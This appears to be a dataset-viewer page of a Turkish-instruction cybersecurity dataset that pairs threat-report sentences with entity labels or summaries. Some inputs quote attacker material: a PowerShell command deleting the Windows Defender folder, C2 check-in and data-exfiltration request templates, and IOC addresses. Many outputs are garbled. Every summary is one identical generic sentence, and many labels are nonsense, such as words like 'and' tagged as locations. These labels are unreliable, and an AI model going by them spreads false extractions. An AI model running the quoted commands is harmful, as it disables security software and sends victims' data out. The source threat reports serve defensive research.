instruction stringclasses 2 values | input stringlengths 3 5.01k | output stringlengths 10 5.79k |
|---|---|---|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Google developed Project Shield, a free protection against distributed denial of service (DDoS) attacks, to protect news media and human rights organization websites. | attack-pattern: distributed denial of service (DDoS); identity: Google |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | ATT&CK® tactics and techniques for Linux were also shared by MITRE. | identity: MITRE; SOFTWARE: Linux |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The obfuscation used was not particularly sophisticated. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | For zero-day vulnerabilities, take advantage of virtual patching. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | These 4 exploits (CVE-2014-1815, CVE-2014-1776, CVE-2014-0322, CVE-2014-0324) were all based on use-after-free bugs. | vulnerability: CVE-2014-1815; vulnerability: CVE-2014-1776; vulnerability: CVE-2014-0324; vulnerability: CVE-2014-0322 |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | It then elevated privileges to install the payload. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Full technical details on the vulnerabilities are available at the sites referenced above. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | 3. Third party app developers using the same key for all apps generated for all customers | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Please mark, I'm not a robot! | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | By using an algorithm to build the list of domains, the attackers also make it harder for defenders to know or predict what domains will be used than if they had a simple list of domains. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | When looking at leak site data across all ransomware families, we’ve observed LockBit 2.0 targeting the highest number of organizations in the following regions: JAPAC, EMEA, and LATAM. | location: JAPAC; location: EMEA; location: LATAM; threat-actor: LockBit 2.0 |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Another proof of concept code sample is additionally available targeting the following 2 filepaths: /opt/vmware/certproxy/bin/certproxyService.sh /usr/local/horizon/scripts/diagnostic/getPasswordExpiry.hzn | FILEPATH: /usr/local/horizon/scripts/diagnostic/getPasswordExpiry.hzn; FILEPATH: /opt/vmware/certproxy/bin/certproxyService.sh |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | We terminated 15 YouTube channels as part of our investigation into coordinated influence operations linked to Ethiopia. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including “guest” posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers. | threat-actor: ups; location: and; location: security; location: likely; location: security |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Generally, 2020 has been dominated by COVID-19. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | This should be as automated as possible and should include 3rd party threat intelligence (i.e. CERT, ISAC, ISAO feeds) History of expertise in correlating multiple threat vectors and the use of AI and Machine Learning | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | If the victim enters the credential in the fake form and clicks anywhere on the page, the script will take the credentials, encode them using base64, replace some characters with custom substrings, and then upload these to Water Pamola’s server. Figure 4. | Infrastucture: Water Pamola’s server; malware: script |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Here is an example from 2015 where “McAfee Email Protection” is offered. | identity: McAfee; location: Protection |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The 3 bytes "efb880" is in UTF-8 encoding. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | According to leak site data for LockBit 2.0, since its inception in June 2021, the RaaS has affected many companies globally, with top victims based in the U.S., Italy and Germany. LockBit 2.0 has also impacted various victims across multiple industry verticals. | threat-actor: LockBit 2.0; location: Italy; threat-actor: LockBit 2.0; TIME: June 2021; location: U.S.; location: Germany |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Their attachments exploit a vulnerability in Ichitaro, as shown above. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Other activities | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Any malware threat analyst will immediately recognize Line 3 in the image above as a potential PlugX-encrypted line. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | SysUpdate was first described by the NCC Group in 2018. | malware: SysUpdate |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | In addition to the previous OLE & HTA exploit, attackers discovered RTF files can also execute ‘text/html’ mime-type OLE objects using the MSHTML. | vulnerability: OLE & HTA exploit |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | First seen Last seen 5.135.120.57 12/4/18 1/24/19 5.135.199.25 3/3/19 3/3/19 31.7.62.48 9/26/18 9/29/18 51.77.11.46 7/1/19 7/2/19 54.36.73.108 7/22/19 10/05/19 54.37.48.172 10/22/19 11/05/19 54.38.124.150 10/28/18 11/17/18 88.150.221.107 9/26/19 11/07/19 91.134.203.59 9/26/18 12/4/18 109.169.89.103 12/2/18 12/14/18 109.200.24.114 11/19/18 12/25/18 137.74.80.220 9/29/18 10/23/18 137.74.157.84 12/18/18 10/21/19 185.122.56.232 9/29/18 11/4/18 185.125.204.57 10/25/18 1/14/19 185.175.138.173 1/19/19 1/22/19 188.165.119.138 10/8/18 11/19/18 193.70.71.112 3/7/19 3/17/19 195.154.41.72 1/13/19 1/20/19 213.32.113.159 6/30/19 9/16/19 216.244.93.137 12/10/18 12/21/18 Table 3. | IPV4: 5.135.120.57; IPV4: 5.135.199.25; IPV4: 31.7.62.48; IPV4: 51.77.11.46; IPV4: 54.36.73.108; IPV4: 54.37.48.172; IPV4: 54.38.124.150; IPV4: 88.150.221.107; IPV4: 91.134.203.59; IPV4: 109.169.89.103; IPV4: 109.200.24.114; IPV4: 137.74.80.220; IPV4: 137.74.157.84; IPV4: 185.122.56.232; IPV4: 185.125.204.57; IPV4: 185.175.138.173; IPV4: 188.165.119.138; IPV4: 193.70.71.112; IPV4: 195.154.41.72; IPV4: 213.32.113.159; IPV4: 216.244.93.137 |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Read on: | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Figure 13. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | We also stumbled upon a Chrome extension plugin (VirtualGirlfriend.crx) that Windows users can contract upon visiting hxxp://miakhalifagame[.]com. | SOFTWARE: Chrome ; SOFTWARE: Windows ; URL: hxxp://miakhalifagame[.]com; malware: VirtualGirlfriend.crx |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Android App: https://www.virustotal.com/gui/file/5d3ff202f20af915863eee45916412a271bae1ea3a0e20988309c16723ce4da5/detection Android App C2: communication-shield[.]site cdsa[.]xyz | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | The file description included the entry VlahmAV, a play on words on ClamAV, and the developer named the ransomware HelloXD and used another potential alias, uKnow, as the developer of HelloXD in the copyright section. | SOFTWARE: ClamAV; malware: HelloXD; malware: uKnow; malware: HelloXD |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q4 2020. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | expand {filename}.ex_ {filename}.dat expand {filename}.ex_ {filename}.exe | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Upgrade Cortex XDR and Traps agents for protection against this vulnerability regardless of whether your systems have installed the relevant security update from Microsoft. | SOFTWARE: Cortex XDR; identity: Microsoft |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Figure 11. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Killkill: Stops the backdoor’s activities interval: Changes the interval in which the backdoor retrieves jobs; the default interval is set at 120 seconds cmd: Executes shell commands exe:Reflectively injects a DLL downloaded from a specific URL | malware: cmd; location: shell |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | However, it seems that currently, it is not only used in ransomware attacks but also in APT attacks. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | And for shoppers, the impact of a successful attack is minimal: there are no lasting effects or impact, making it an annoyance at worst. But because of the potential impact on holiday shopping and the ease of attacks, unauthorized coin mining is an attack that retailers need to be aware of and take active steps for prevention this holiday season. | attack-pattern: unauthorized coin mining |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | This has more in common with the Heartbleed event of 2014. | vulnerability: Heartbleed; TIME: 2014 |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | In both images, the user is presented with a shortcut file (LNK file) that starts the malicious activity when double-clicked. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Blackgear (also known as Topgear and Comnie) is a cyberespionage campaign dating back to 2008, at least based on the Protux backdoor used by its operators. | campaign: Blackgear; campaign: Topgear; campaign: Comnie; TIME: 2008; malware: Protux backdoor |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | What Does it Mean for Me? | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | In detail, this process involves multiple steps. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Figure 5: A seller advertising a customizable “xxx.edu” email account. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | This is a classic network worm-class vulnerability like MS-Blaster and Conficker. | vulnerability: MS-Blaster; vulnerability: Conficker |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | This means that even though this malware is functionally ransomware, for threat assessment purposes, it should be functionally considered a “wiper”. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Table 2. APT33 C&C domains for extreme narrow targeting Figure 1. Schema showing the multiple obfuscation layers that APT33 uses | threat-actor: APT33; threat-actor: APT33 |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | This is even more true when the group has existed for many years and has many pieces of evidence to compare. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Tags Articles, News, Reports | APT & Targeted Attacks | Research | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The hack-for-hire landscape is fluid, both in how the attackers organize themselves and in the wide range of targets they pursue in a single campaign at the behest of disparate clients. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Payload as FlawedAmmyy downloader | malware: FlawedAmmyy |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Over 90 percent of these users were targeted via “credential phishing emails” similar to the example below. | attack-pattern: phishing |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Most of the observed malware was capable of stealing both user passwords and cookies. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Vision One integrates with Palo Alto Networks Cortex™ XSOAR to drive automated response to incidents uncovered by Vision One. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Magecart is so effective that multiple groups are said to be using the code, a piece of malicious JavaScript, to infect websites around the world. | malware: Magecart |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | RATANKBA Infection Flow RATANKBA is delivered to its victims using a variety of lure documents, including Microsoft Office documents, malicious CHM files, and different script downloaders. | malware: RATANKBA; location: lure; location: and |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Then the headData is encoded through the customized routine. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | For example, GandCrab uses JScript as a downloader, leveraging Windows Background Intelligent Transfer Service (BITS) to download the payload in the background (Figure 5). | malware: GandCrab; tools: Windows Background Intelligent Transfer Service (BITS) |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | He also rated apps made by two additional publishers with the names "MilApps101" and "Milapps102." | malware: MilApps101; malware: Milapps102 |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | PowerShell process used to delete Windows Defender, e.g. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse 8. File InstallUtil.exe running from C:\Users\[USERNAME]\AppData\Local\Temp directory. | tools: PowerShell; FILEPATH: C:\ProgramData\Microsoft\Windows Defender; FILEPATH: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; FILEPATH: InstallUtil.exe; tools: Windows Defender; FILEPATH: C:\Users\[USERNAME]\AppData\Local\Temp |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | While not stolen credentials, the effect is the same: attackers can use those credentials to abuse otherwise legitimate access and privileges to carry out their attacks. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Malicious mobile apps are common infection vectors for cybercriminals, as they can attract specific target audiences. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } } | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | In some instances, malware projects require external libraries, and some libraries used the “assert()” mechanism to help the developers debug unexpected conditions. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Phase 2: Double extortion. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | During our analysis of the indicators of compromise (IoCs) in the deployed samples that were infecting the victim’s machines, we noticed some interesting characteristics: notably that these samples were making use of obfuscation tools that made them virtually undetectable. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | It collects the following information from the infected system by invoking the following commands: Command Description system_profiler SPHardwareDataType 2>/dev/null | awk '/Processor / {split($0,line,\":\"); printf(\"%s\",line[2]);}' Get processor information 15f20 = system_profiler SPHardwareDataType 2>/dev/null | awk '/Memory/ {split($0,line, \":\"); printf(\"%s\", line[2]);}' | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | It also steal information about the machine’s system i.e. default browser, OS version, Firefox version, Chrome version, IE version and Network configuration (right). | SOFTWARE: IE ; SOFTWARE: OS ; SOFTWARE: Chrome; SOFTWARE: Firefox |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Pluguin - When penguins and wall sockets mate. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | GET http://{C2}/Index.php?Ck=OK HTTP/1.1 | URL: http://{C2}/Index.php?Ck |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The DLL file also examines drives other than C: | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Palo Alto Networks has published a vulnerability scanner app in the Google Play store. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | HTTP POST request containing unique SHA256 key PClock2 scans the file system of the victim in order to identify files that are to be encrypted. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | POST http://{C2}/?Key={GUID}&Crc={Identifier} { "appName": "Gmail Downloader", "targetname": "{Email}", "HostName": "REDACTED", "srcUserIP": "REDACTED", "actionType": "First", "timeOccurrence": "05/01/2022 05:50:31 PM", "OS": "REDACTED", "OSVersion": "REDACTED", "SystemModel": "REDACTED", "SystemType": "REDACTED", "srcName": "REDACTED", "srcOrgName": "REDACTED" } | location: POST; URL: http://{C2}/?Key={GUID}&Crc={Identifier; TIME: 05:50:31 PM |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Figure 13. Build from Metasploit and Request Permissions We also identified a malicious version of the My First APP application that added Metasploit whose class names have been obfuscated. | malware: Metasploit; location: and; malware: Metasploit |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Online shop administrators should be aware that potential attacks may come not only from spam but also from different — and unexpected — infection vectors. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Overall, WanaCrypt0r has been a notable incident within the security community, as the threat couples a wormable vulnerability/exploit with a ransomware family. | malware: WanaCrypt0r |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | What Is Unauthorized Coin Mining? | attack-pattern: Unauthorized Coin Mining |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The timestamp of the dropped files 4) Delete itself | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | A significant portion of MuddyWater’s toolset consisted of open sourced red-teaming tools such as Invoke-Obfuscation, Lazagne, Mimikatz, etc. https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/ https://securelist.com/muddywater/88059/ https://www.clearskysec.com/muddywater2/ https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/ | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | This post is also available in: 日本語 (Japanese) On Aug. 25, 2021, Atlassian released a security advisory for an injection vulnerability in Confluence Server and Data Center, CVE-2021-26084. | vulnerability: CVE-2021-26084; SOFTWARE: Confluence Server and Data Center; identity: Atlassian; TIME: Aug. 25, 2021 |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Additional resources https://www.zerodayinitiative.com/about https://www.zerodayinitiative.com/blog Tags | URL: https://www.zerodayinitiative.com/about; URL: https://www.zerodayinitiative.com/blog |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | On account-trading markets, hijacked channels ranged from $3 USD to $4,000 USD depending on the number of subscribers. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | This unique sample was packaged in a manner consistent with known APT29 techniques and their recent campaigns, which leveraged well-known cloud storage and online collaboration applications. | location: sample; threat-actor: APT29; location: and; location: cloud; location: and |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | We mapped Winnti’s activities for this campaign by analyzing the dates exposed in GitHub. | identity: Winnti; SOFTWARE: GitHub |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | For example, the standard annual fee for Amazon Prime is $99 USD; however, with the student discount, a buyer could enjoy it for free the first six months and then renew at half price for subsequent years. | identity: Amazon Prime |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Host IOCs Registry Keys HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update File Paths C:\Windows\System32\Nwsapagent.sys C:\Windows\System32\helpsvc.sys C:\ProgramData\USOShared\uso.bin C:\ProgramData\VMware\vmnat-update.bin C:\ProgramData\VirtualBox\update.bin | location: Host; REGISTRYKEY: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig; REGISTRYKEY: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig; REGISTRYKEY: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Its latest version can mute the device (i.e., take out the ringtone and vibration features) and sync call logs and SMSs. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The kit we found is in tgz format, though we have observed some samples disguised as png or jpg. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | This URL abused a logic flaw and forced Chrome to load another URL in the Samsung Browser without user interaction or warnings. | SOFTWARE: Chrome; SOFTWARE: Samsung Browser |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | In that sense, we are emphasizing TTPs correlation in this case. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | We were able to analyze 31,953 packet captures that triggered the Spring Core Remote Code Execution Vulnerability signature to determine the webshell filenames and the webshell contents that would be saved to the server in the event of successful exploitation. | vulnerability: Spring Core Remote Code Execution Vulnerability; attack-pattern: webshell; attack-pattern: webshell |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | The references to “Hidden” are related to the rootkit itself. | location: are; attack-pattern: rootkit |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The fake Flash installer download website Analysis of the fake Flash installer | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Figure 3. The spear-phishing email disguised as an advertisement for a shopping coupon Figure 4. | location: spear; attack-pattern: phishing; location: coupon |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | However, the 'DoS' consists only of a single GET request to the target website, not enough to be effective. | attack-pattern: DoS |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | In this blog post Trend Micro researchers discuss the malware variant’s current capabilities, including the addition of features intended to make it more difficult to detect in infected machines. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | NOTE: On May 20th, we updated our attribution to more precisely describe our findings. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | , it will stop. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Scrambling ‘Mac OSX 10.12’ Encryption | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.